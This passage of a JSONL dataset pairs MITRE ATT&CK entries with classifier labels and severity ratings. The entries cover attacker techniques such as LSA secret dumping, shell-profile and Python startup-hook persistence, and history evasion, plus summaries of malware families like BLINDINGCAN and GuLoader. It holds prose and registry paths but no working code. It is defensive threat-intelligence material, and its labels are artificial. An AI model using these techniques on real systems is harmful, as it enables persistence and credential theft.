network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview)\n\nKernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands. Several examples have been found where this can be used. (Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken) Examples have been found in the wild. (Citation: Securelist Ventir)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1215", "technique_name": "Kernel Modules and Extensions", "tactics": ["persistence"]}}]}
{"id": "mitre_00341", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Execution Guardrails\n\nTechnique: T1480\nTactics: defense-evasion\nPlatforms: ESXi, Linux, macOS, Windows\n\nAdversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary\u2019s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)\n\nGuardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.\n\nAdversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1480", "technique_name": "Execution Guardrails", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00342", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Data from Removable Media\n\nTechnique: T1025\nTactics: collection\nPlatforms: Linux, macOS, Windows\n\nAdversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information. \n\nSome adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1025", "technique_name": "Data from Removable Media", "tactics": ["collection"]}}]}
{"id": "mitre_00343", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# REPTILE\n\nType: malware\nPlatforms: Linux\n\n[REPTILE](https://attack.mitre.org/software/S1219) is an open-source Linux rootkit with multiple components that provides backdoor access and functionality.(Citation: Google Cloud Mandiant UNC3886 2024)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "REPTILE", "malware_type": "malware"}}]}
{"id": "mitre_00344", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# LSA Secrets\n\nTechnique: T1003.004\nTactics: credential-access\nPlatforms: Windows\n\nAdversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\\SECURITY\\Policy\\Secrets. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)\n\n[Reg](https://attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1003.004", "technique_name": "LSA Secrets", "tactics": ["credential-access"]}}]}
{"id": "mitre_00345", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# BLINDINGCAN\n\nType: malware\nPlatforms: Windows\n\n[BLINDINGCAN](https://attack.mitre.org/software/S0520) is a remote access Trojan that has been used by the North Korean government since at least early 2020 in cyber operations against defense, engineering, and government organizations in Western Europe and the US.(Citation: US-CERT BLINDINGCAN Aug 2020)(Citation: NHS UK BLINDINGCAN Aug 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "BLINDINGCAN", "malware_type": "malware"}}]}
{"id": "mitre_00346", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Green Lambert\n\nType: malware\nPlatforms: Windows, iOS, macOS, Linux\n\n[Green Lambert](https://attack.mitre.org/software/S0690) is a modular backdoor that security researchers assess has been used by an advanced threat group referred to as Longhorn and The Lamberts. First reported in 2017, the Windows variant of [Green Lambert](https://attack.mitre.org/software/S0690) may have been used as early as 2008; a macOS version was uploaded to a multiscanner service in September 2014.(Citation: Kaspersky Lamberts Toolkit April 2017)(Citation: Objective See Green Lambert for OSX Oct 2021) ", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Green Lambert", "malware_type": "malware"}}]}
{"id": "mitre_00347", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# RawPOS\n\nType: malware\nPlatforms: Windows\n\n[RawPOS](https://attack.mitre.org/software/S0169) is a point-of-sale (POS) malware family that searches for cardholder data on victims. It has been in use since at least 2008. (Citation: Kroll RawPOS Jan 2017) (Citation: TrendMicro RawPOS April 2015) (Citation: Visa RawPOS March 2015) FireEye divides RawPOS into three components: FIENDCRY, DUEBREW, and DRIFTWOOD. (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: DarkReading FireEye FIN5 Oct 2015)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "RawPOS", "malware_type": "malware"}}]}
{"id": "mitre_00348", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# HermeticWizard\n\nType: malware\nPlatforms: Windows\n\n[HermeticWizard](https://attack.mitre.org/software/S0698) is a worm that has been used to spread [HermeticWiper](https://attack.mitre.org/software/S0697) in attacks against organizations in Ukraine since at least 2022.(Citation: ESET Hermetic Wizard March 2022)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "HermeticWizard", "malware_type": "malware"}}]}
{"id": "mitre_00349", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Authentication Package\n\nTechnique: T1547.002\nTactics: persistence, privilege-escalation\nPlatforms: Windows\n\nAdversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)\n\nAdversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\ with the key value of \"Authentication Packages\"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1547.002", "technique_name": "Authentication Package", "tactics": ["persistence", "privilege-escalation"]}}]}
{"id": "mitre_00350", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# File Deletion\n\nTechnique: T1107\nTactics: defense-evasion\nPlatforms: Linux, macOS, Windows\n\nAdversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n\nThere are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1107", "technique_name": "File Deletion", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00351", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# HISTCONTROL\n\nTechnique: T1148\nTactics: defense-evasion\nPlatforms: Linux, macOS\n\nThe HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. This setting can be configured to ignore commands that start with a space by simply setting it to \"ignorespace\". HISTCONTROL can also be set to ignore duplicate commands by setting it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\" which covers both of the previous examples. This means that \u201c ls\u201d will not be saved, but \u201cls\u201d would be saved by history. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected. Adversaries can use this to operate without leaving traces by simply prepending a space to all of their terminal commands.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1148", "technique_name": "HISTCONTROL", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00352", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Junk Code Insertion\n\nTechnique: T1027.016\nTactics: defense-evasion\nPlatforms: Linux, macOS, Windows\n\nAdversaries may use junk code / dead code to obfuscate a malware\u2019s functionality. Junk code is code that either does not execute, or if it does execute, does not change the functionality of the code. Junk code makes analysis more difficult and time-consuming, as the analyst steps through non-functional code instead of analyzing the main code. It also may hinder detections that rely on static code analysis due to the use of benign functionality, especially when combined with [Compression](https://attack.mitre.org/techniques/T1027/015) or [Software Packing](https://attack.mitre.org/techniques/T1027/002).(Citation: ReasonLabs)(Citation: ReasonLabs Cyberpedia Junk Code)\n\nNo-Operation (NOP) instructions are an example of dead code commonly used in x86 assembly language. They are commonly used as the 0x90 opcode. When NOPs are added to malware, the disassembler may show the NOP instructions, leading to the analyst needing to step through them.(Citation: ReasonLabs)\n\nThe use of junk / dead code insertion is distinct from [Binary Padding](https://attack.mitre.org/techniques/T1027/001) because the purpose is to obfuscate the functionality of the code, rather than simply to change the malware\u2019s signature. ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1027.016", "technique_name": "Junk Code Insertion", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00353", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# IDE Tunneling\n\nTechnique: T1219.001\nTactics: command-and-control\nPlatforms: Linux, macOS, Windows\n\nAdversaries may abuse Integrated Development Environment (IDE) software with remote development features to establish an interactive command and control channel on target systems within a network. IDE tunneling combines SSH, port forwarding, file sharing, and debugging into a single secure connection, letting developers work on remote systems as if they were local. Unlike SSH and port forwarding, IDE tunneling encapsulates an entire session and may use proprietary tunneling protocols alongside SSH, allowing adversaries to blend in with legitimate development workflows. Some IDEs, like Visual Studio Code, also provide CLI tools (e.g., `code tunnel`) that adversaries may use to programmatically establish tunnels and generate web-accessible URLs for remote access. These tunnels can be authenticated through accounts such as GitHub, enabling the adversary to control the compromised system via a legitimate developer portal.(Citation: sentinelone operationDigitalEye Dec 2024)(Citation: Unit42 Chinese VSCode 06 September 2024)(Citation: Thornton tutorial VSCode shell September 2023)\n\nAdditionally, adversaries may use IDE tunneling for persistence. Some IDEs, such as Visual Studio Code and JetBrains, support automatic reconnection. Adversaries may configure the IDE to auto-launch at startup, re-establishing the tunnel upon execution. Compromised developer machines may also be exploited as jump hosts to move further into the network.\n\nIDE tunneling tools may be built-in or installed as [IDE Extensions](https://attack.mitre.org/techniques/T1176/002).", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1219.001", "technique_name": "IDE Tunneling", "tactics": ["command-and-control"]}}]}
{"id": "mitre_00354", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Delete Cloud Instance\n\nTechnique: T1578.003\nTactics: defense-evasion\nPlatforms: IaaS\n\nAn adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.\n\nAn adversary may also [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and later terminate the instance after achieving their objectives.(Citation: Mandiant M-Trends 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1578.003", "technique_name": "Delete Cloud Instance", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00355", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# BoxCaon\n\nType: malware\nPlatforms: Windows\n\n[BoxCaon](https://attack.mitre.org/software/S0651) is a Windows backdoor that was used by [IndigoZebra](https://attack.mitre.org/groups/G0136) in a 2021 spearphishing campaign against Afghan government officials. [BoxCaon](https://attack.mitre.org/software/S0651)'s name stems from similarities shared with the malware family [xCaon](https://attack.mitre.org/software/S0653).(Citation: Checkpoint IndigoZebra July 2021)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "BoxCaon", "malware_type": "malware"}}]}
{"id": "mitre_00356", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Python Startup Hooks\n\nTechnique: T1546.018\nTactics: persistence, privilege-escalation\nPlatforms: Linux, macOS, Windows\n\nAdversaries may achieve persistence by leveraging Python\u2019s startup mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py` or `usercustomize.py` modules. These files are automatically processed during the initialization of the Python interpreter, allowing for the execution of arbitrary code whenever Python is invoked.(Citation: Volexity GlobalProtect CVE 2024)\n\nPath configuration files are designed to extend Python\u2019s module search paths through the use of import statements. If a `.pth` file is placed in Python's `site-packages` or `dist-packages` directories, any lines beginning with `import` will be executed automatically on Python invocation.(Citation: DFIR Python Persistence 2025) Similarly, if `sitecustomize.py` or `usercustomize.py` is present in the Python path, these files will be imported during interpreter startup, and any code they contain will be executed.(Citation: Python Site Configuration Hook)\n\nAdversaries may abuse these mechanisms to establish persistence on systems where Python is widely used (e.g., for automation or scripting in production environments). ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1546.018", "technique_name": "Python Startup Hooks", "tactics": ["persistence", "privilege-escalation"]}}]}
{"id": "mitre_00357", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# SID-History Injection\n\nTechnique: T1134.005\nTactics: defense-evasion, privilege-escalation\nPlatforms: Windows\n\nAdversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).\n\nWith Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002), or [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1134.005", "technique_name": "SID-History Injection", "tactics": ["defense-evasion", "privilege-escalation"]}}]}
{"id": "mitre_00358", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# HUI Loader\n\nType: malware\nPlatforms: Windows\n\n[HUI Loader](https://attack.mitre.org/software/S1097) is a custom DLL loader that has been used since at least 2015 by China-based threat groups including [Cinnamon Tempest](https://attack.mitre.org/groups/G1021) and [menuPass](https://attack.mitre.org/groups/G0045) to deploy malware on compromised hosts. [HUI Loader](https://attack.mitre.org/software/S1097) has been observed in campaigns loading [SodaMaster](https://attack.mitre.org/software/S0627), [PlugX](https://attack.mitre.org/software/S0013), [Cobalt Strike](https://attack.mitre.org/software/S0154), [Komplex](https://attack.mitre.org/software/S0162), and several strains of ransomware.(Citation: SecureWorks BRONZE STARLIGHT Ransomware Operations June 2022)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "HUI Loader", "malware_type": "malware"}}]}
{"id": "mitre_00359", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Prikormka\n\nType: malware\nPlatforms: Windows\n\n[Prikormka](https://attack.mitre.org/software/S0113) is a malware family used in a campaign known as Operation Groundbait. It has predominantly been observed in Ukraine and was used as early as 2008. (Citation: ESET Operation Groundbait)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Prikormka", "malware_type": "malware"}}]}
{"id": "mitre_00360", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# GuLoader\n\nType: malware\nPlatforms: Windows\n\n[GuLoader](https://attack.mitre.org/software/S0561) is a file downloader that has been used since at least December 2019 to distribute a variety of remote administration tool (RAT) malware, including [NETWIRE](https://attack.mitre.org/software/S0198), [Agent Tesla](https://attack.mitre.org/software/S0331), [NanoCore](https://attack.mitre.org/software/S0336), FormBook, and Parallax RAT.(Citation: Unit 42 NETWIRE April 2020)(Citation: Medium Eli Salem GuLoader April 2021)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "GuLoader", "malware_type": "malware"}}]}
{"id": "mitre_00361", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Startup Items\n\nTechnique: T1165\nTactics: persistence, privilege-escalation\nPlatforms: macOS\n\nPer Apple\u2019s documentation, startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items (Citation: Startup Items). This is technically a deprecated version (superseded by Launch Daemons), and thus the appropriate folder, /Library/StartupItems isn\u2019t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), StartupParameters.plist, reside in the top-level directory. \n\nAn adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism (Citation: Methods of Mac Malware Persistence). Additionally, since StartupItems run during the bootup phase of macOS, they will run as root. If an adversary is able to modify an existing Startup Item, then they will be able to Privilege Escalate as well.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1165", "technique_name": "Startup Items", "tactics": ["persistence", "privilege-escalation"]}}]}
{"id": "mitre_00362", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# KARAE\n\nType: malware\nPlatforms: Windows\n\n[KARAE](https://attack.mitre.org/software/S0215) is a backdoor typically used by [APT37](https://attack.mitre.org/groups/G0067) as first-stage malware. (Citation: FireEye APT37 Feb 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "KARAE", "malware_type": "malware"}}]}
{"id": "mitre_00363", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# NTFS File Attributes\n\nTechnique: T1096\nTactics: defense-evasion\nPlatforms: Windows\n\nEvery New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)\n\nAdversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1096", "technique_name": "NTFS File Attributes", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00364", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Unix Shell Configuration Modification\n\nTechnique: T1546.004\nTactics: privilege-escalation, persistence\nPlatforms: Linux, macOS\n\nAdversaries may establish persistence through executing malicious commands triggered by a user\u2019s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (/etc) and the user\u2019s home directory (~/) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user\u2019s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately. \n\nAdversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the /etc/profile and /etc/profile.d files.(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) These files typically require root permissions to modify and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into ~/.bash_profile, ~/.bash_login, or ~/.profile which are sourced when a user opens a command-line interface or connects remotely.(Citation: anomali-rocke-tactics)(Citation: Linux manual bash invocation) Since the system only executes the first existing file in the listed order, adversaries have used ~/.bash_profile to ensure execution. Adversaries have also leveraged the ~/.bashrc file which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface.(Citation: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation: Magento) Some malware targets the termination of a program to trigger execution, adversaries can use the ~/.bash_logout file to execute malicious commands at the end of a session. \n\nFor macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using /etc/profile, /etc/zshenv, /etc/zprofile, and /etc/zlogin.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: code_persistence_zsh)(Citation: macOS MS office sandbox escape) The login shell then configures the user environment with ~/.zprofile and ~", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1546.004", "technique_name": "Unix Shell Configuration Modification", "tactics": ["privilege-escalation", "persistence"]}}]}
{"id": "mitre_00365", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Employee Names\n\nTechnique: T1589.003\nTactics: reconnaissance\nPlatforms: PRE\n\nAdversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.\n\nAdversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1589.003", "technique_name": "Employee Names", "tactics": ["reconnaissance"]}}]}
{"id": "mitre_00366", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Kessel\n\nType: malware\nPlatforms: Linux\n\n[Kessel](https://attack.mitre.org/software/S0487) is an advanced version of OpenSSH which acts as a custom backdoor, mainly acting to steal credentials and function as a bot. [Kessel](https://attack.mitre.org/software/S0487) has been active since its C2 domain began resolving in August 2018.(Citation: ESET ForSSHe December 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Kessel", "malware_type": "malware"}}]}
{"id": "mitre_00367", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Emond\n\nTechnique: T1519\nTactics: persistence, privilege-escalation\nPlatforms: macOS\n\nAdversaries may use Event Monitor Daemon (emond) to establish persistence by scheduling malicious commands to run on predictable event triggers. Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1160) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at /sbin/emond will load any rules from the /etc/emond.d/rules/ directory and take action once an explicitly defined event takes place. The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1160) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)\n\nAdversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1160) service.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1519", "technique_name": "Emond", "tactics": ["persistence", "privilege-escalation"]}}]}
{"id": "mitre_00368", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# System Time Discovery\n\nTechnique: T1124\nTactics: discovery\nPlatforms: ESXi, Linux, macOS, Network Devices, Windows\n\nAn adversary may gather the system time and/or time zone settings from a local or remote system. The system time is set and stored by services, such as the Windows Time Service on Windows or systemsetup on macOS.(Citation: MSDN System Time)(Citation: Technet Windows Time Service)(Citation: systemsetup mac time) These time settings may also be synchronized between systems and services in an enterprise network, typically accomplished with a network time server within a domain.(Citation: Mac Time Sync)(Citation: linux system time)\n\nSystem time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing net time \\\\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz.(Citation: Technet Windows Time Service) In addition, adversaries can discover device uptime through functions such as GetTickCount() to determine how long it has been since the system booted up.(Citation: Virtualization/Sandbox Evasion)\n\nOn network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show clock detail` can be used to see the current time configuration.(Citation: show_clock_detail_cisco_cmd) On ESXi servers, `esxcli system clock get` can be used for the same purpose.\n\nIn addition, system calls \u2013 such as time() \u2013 have been used to collect the current time on Linux devices.(Citation: MAGNET GOBLIN) On macOS systems, adversaries may use commands such as systemsetup -gettimezone or timeIntervalSinceNow to gather current time zone information or current date and time.(Citation: System Information Discovery Technique)(Citation: ESET DazzleSpy Jan 2022)\n\nThis information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)(Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1124", "technique_name": "System Time Discovery", "tactics": ["discovery"]}}]}
{"id": "mitre_00369", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# InstallUtil\n\nTechnique: T1118\nTactics: defense-evasion, execution\nPlatforms: Windows\n\nInstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is located in the .NET directories on a Windows system: C:\\Windows\\Microsoft.NET\\Framework\\v\\InstallUtil.exe and C:\\Windows\\Microsoft.NET\\Framework64\\v\\InstallUtil.exe. InstallUtil.exe is digitally signed by Microsoft.\n\nAdversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil may also be used to bypass process whitelisting through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1118", "technique_name": "InstallUtil", "tactics": ["defense-evasion", "execution"]}}]}
{"id": "mitre_00370", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Resource Hijacking\n\nTechnique: T1496\nTactics: impact\nPlatforms: Windows, IaaS, Linux, macOS, Containers, SaaS\n\nAdversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. \n\nResource hijacking may take a number of different forms. For example, adversaries may:\n\n* Leverage compute resources in order to mine cryptocurrency\n* Sell network bandwidth to proxy networks\n* Generate SMS traffic for profit\n* Abuse cloud-based messaging services to send large quantities of spam messages\n\nIn some cases, adversaries may leverage multiple types of Resource Hijacking at once.(Citation: Sysdig Cryptojacking Proxyjacking 2023)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1496", "technique_name": "Resource Hijacking", "tactics": ["impact"]}}]}
